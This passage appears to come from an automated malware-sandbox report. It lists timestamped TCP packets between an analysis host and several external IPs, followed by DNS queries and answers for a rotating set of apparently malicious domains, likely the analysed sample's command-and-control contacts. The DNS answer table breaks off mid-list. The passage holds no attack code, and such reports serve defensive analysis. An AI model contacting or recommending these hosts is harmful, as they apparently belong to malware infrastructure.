                                                            Nov 20, 2024 21:10:08.716196060 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:08.835690022 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431771994 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431813955 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431827068 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431871891 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431885958 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431896925 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431909084 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:11.431962967 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:11.432009935 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:11.460197926 CET4992080192.168.2.5106.15.109.33
                                                            Nov 20, 2024 21:10:11.579804897 CET8049920106.15.109.33192.168.2.5
                                                            Nov 20, 2024 21:10:16.983781099 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:17.104945898 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:17.105063915 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:17.119976044 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:17.242368937 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:18.516494989 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:18.516948938 CET804993845.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:18.517014027 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:18.627063036 CET4993880192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.648710966 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.769891977 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:19.770307064 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.784112930 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:19.903608084 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:21.084203005 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:21.084309101 CET804994545.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:21.084482908 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:21.298816919 CET4994580192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.317893028 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.443996906 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:22.444133043 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.459631920 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:22.580857038 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:22.580881119 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:23.802182913 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:23.802249908 CET804995245.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:23.802371979 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:23.970788002 CET4995280192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:24.990597963 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:25.110342026 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:25.110431910 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:25.119486094 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:25.239628077 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:26.470025063 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:26.471107960 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:26.471191883 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:26.473028898 CET4995980192.168.2.545.141.156.114
                                                            Nov 20, 2024 21:10:26.596790075 CET804995945.141.156.114192.168.2.5
                                                            Nov 20, 2024 21:10:32.430073977 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:32.549705982 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:32.549834013 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:32.564551115 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:32.684164047 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:33.895478964 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:33.939450026 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:34.080195904 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:34.087848902 CET8049974202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:34.087932110 CET4997480192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.098440886 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.218300104 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:35.218436003 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.233187914 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:35.354226112 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:36.618599892 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:36.674019098 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:36.736605883 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:36.841474056 CET8049981202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:36.841626883 CET4998180192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:37.755419016 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:37.880790949 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:37.880872965 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:37.903876066 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:38.025155067 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:38.025353909 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:39.303628922 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:39.345771074 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:39.408272982 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:39.506194115 CET8049988202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:39.506361008 CET4998880192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.428179026 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.548038006 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:40.548170090 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.561042070 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:40.682413101 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:42.010817051 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:42.064416885 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:42.220601082 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:42.220741034 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:42.221574068 CET4999580192.168.2.5202.79.161.151
                                                            Nov 20, 2024 21:10:42.342642069 CET8049995202.79.161.151192.168.2.5
                                                            Nov 20, 2024 21:10:47.626879930 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:47.746406078 CET8050002104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:47.746534109 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:47.760278940 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:47.879970074 CET8050002104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:49.267611980 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:49.403639078 CET8050002104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:49.403712988 CET5000280192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.286459923 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.406147957 CET8050003104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:50.406368017 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.420706987 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:50.541374922 CET8050003104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:51.923863888 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:52.044152975 CET8050003104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:52.044397116 CET5000380192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:52.943306923 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:53.063004971 CET8050004104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:53.063107967 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:53.078188896 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:53.198834896 CET8050004104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:53.199014902 CET8050004104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:54.580163002 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:54.700084925 CET8050004104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:54.700328112 CET5000480192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.598834991 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.719331980 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:55.719516993 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.732326984 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:55.852751970 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.742898941 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.742994070 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.743232012 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:57.744132042 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:10:57.744188070 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:57.745820045 CET5000580192.168.2.5104.21.40.167
                                                            Nov 20, 2024 21:10:57.865432024 CET8050005104.21.40.167192.168.2.5
                                                            Nov 20, 2024 21:11:03.293638945 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:03.413746119 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:03.413974047 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:03.428093910 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:03.547842979 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:04.519484043 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:04.519624949 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:04.942178965 CET5000680192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:05.061883926 CET805000613.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:05.957777023 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:06.077658892 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:06.077769995 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:06.092484951 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:06.212284088 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:07.191054106 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:07.191144943 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:07.596963882 CET5000780192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:07.716805935 CET805000713.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:08.614015102 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:08.734138966 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:08.734251022 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:08.749001026 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:08.870187044 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:08.870218992 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:09.929326057 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:09.929439068 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:10.252101898 CET5000880192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:10.372347116 CET805000813.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:11.274594069 CET5000980192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:11.394671917 CET805000913.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:11.394803047 CET5000980192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:11.403420925 CET5000980192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:11.523241043 CET805000913.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:12.554590940 CET805000913.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:12.554620981 CET805000913.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:12.554753065 CET5000980192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:12.556972027 CET5000980192.168.2.513.248.169.48
                                                            Nov 20, 2024 21:11:12.676570892 CET805000913.248.169.48192.168.2.5
                                                            Nov 20, 2024 21:11:17.985003948 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:18.104895115 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:18.105000019 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:18.119831085 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:18.239480019 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344311953 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344337940 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344353914 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344362974 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344378948 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344394922 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344531059 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344547033 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344608068 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:19.344691038 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:19.344726086 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344876051 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.344934940 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:19.464287043 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.464304924 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.464390993 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:19.468502998 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.517550945 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:19.536206007 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.536262035 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.536370039 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:19.538835049 CET8050010203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:19.541935921 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:19.627028942 CET5001080192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:20.779345989 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:20.900576115 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:20.900655031 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:20.966727972 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:21.086422920 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231471062 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231486082 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231496096 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231504917 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231515884 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231527090 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231538057 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231548071 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231559038 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231569052 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.231638908 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:22.231638908 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:22.231638908 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:22.231638908 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:22.351572037 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.351641893 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.351804972 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:22.441709995 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.442214966 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.442473888 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:22.444694996 CET8050011203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:22.447941065 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:22.470756054 CET5001180192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:23.488903999 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:23.610125065 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:23.612113953 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:23.625160933 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:23.744868994 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:23.745265007 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845030069 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845060110 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845086098 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845102072 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845117092 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845134020 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845146894 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:24.845149994 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845165968 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845190048 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:24.845206976 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:24.845361948 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845525980 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.845577955 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:24.967655897 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.967715979 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:24.967869043 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:24.971879005 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:25.017496109 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:25.037005901 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:25.037024021 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:25.037065983 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:25.039570093 CET8050012203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:25.039633989 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:25.127027988 CET5001280192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:26.537556887 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:26.657582998 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:26.657814026 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:26.666960001 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:26.788383007 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981154919 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981173992 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981184006 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981194973 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981208086 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981218100 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981291056 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981307983 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:27.981317043 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981354952 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:27.981373072 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:27.981466055 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981477976 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:27.981509924 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:28.103071928 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:28.103133917 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:28.103199005 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:28.107281923 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:28.158154011 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:28.191389084 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:28.191440105 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:28.191489935 CET5001380192.168.2.5203.161.42.73
                                                            Nov 20, 2024 21:11:28.194133043 CET8050013203.161.42.73192.168.2.5
                                                            Nov 20, 2024 21:11:28.194205999 CET5001380192.168.2.5203.161.42.73
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 20, 2024 21:08:55.809027910 CET5546053192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:08:56.276524067 CET53554601.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:09:12.880589008 CET5048053192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:09:13.773432970 CET53504801.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:09:28.865216970 CET5436253192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:09:29.861475945 CET5436253192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:09:30.053472996 CET53543621.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:09:30.053487062 CET53543621.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:09:44.677521944 CET5611453192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:09:45.274712086 CET53561141.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:09:59.744990110 CET5445253192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:10:00.589481115 CET53544521.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:10:16.474227905 CET5501353192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:10:16.981148958 CET53550131.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:10:31.489619970 CET6064753192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:10:32.427583933 CET53606471.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:10:47.243146896 CET6221253192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:10:47.624433041 CET53622121.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:11:02.755608082 CET6357253192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:11:03.291230917 CET53635721.1.1.1192.168.2.5
                                                            Nov 20, 2024 21:11:17.567687035 CET6504553192.168.2.51.1.1.1
                                                            Nov 20, 2024 21:11:17.981044054 CET53650451.1.1.1192.168.2.5
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 20, 2024 21:08:55.809027910 CET192.168.2.51.1.1.10x9122Standard query (0)www.izmirescortg.xyzA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:12.880589008 CET192.168.2.51.1.1.10xff06Standard query (0)www.aballanet.catA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:28.865216970 CET192.168.2.51.1.1.10xbb9bStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:29.861475945 CET192.168.2.51.1.1.10xbb9bStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:44.677521944 CET192.168.2.51.1.1.10x1707Standard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:59.744990110 CET192.168.2.51.1.1.10x8e45Standard query (0)www.yunlekeji.topA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:16.474227905 CET192.168.2.51.1.1.10xff28Standard query (0)www.logidant.xyzA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:31.489619970 CET192.168.2.51.1.1.10xebb1Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:10:47.243146896 CET192.168.2.51.1.1.10x9ba9Standard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:11:02.755608082 CET192.168.2.51.1.1.10x9924Standard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:11:17.567687035 CET192.168.2.51.1.1.10x7b1dStandard query (0)www.brightvision.websiteA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 20, 2024 21:08:56.276524067 CET1.1.1.1192.168.2.50x9122No error (0)www.izmirescortg.xyz104.21.36.62A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:08:56.276524067 CET1.1.1.1192.168.2.50x9122No error (0)www.izmirescortg.xyz172.67.186.192A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:13.773432970 CET1.1.1.1192.168.2.50xff06No error (0)www.aballanet.cataballanet.catCNAME (Canonical name)IN (0x0001)false
                                                            Nov 20, 2024 21:09:13.773432970 CET1.1.1.1192.168.2.50xff06No error (0)aballanet.cat134.0.14.158A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:30.053472996 CET1.1.1.1192.168.2.50xbb9bNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:30.053487062 CET1.1.1.1192.168.2.50xbb9bNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                            Nov 20, 2024 21:09:45.274712086 CET1.1.1.1192.168.2.50x1707No error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
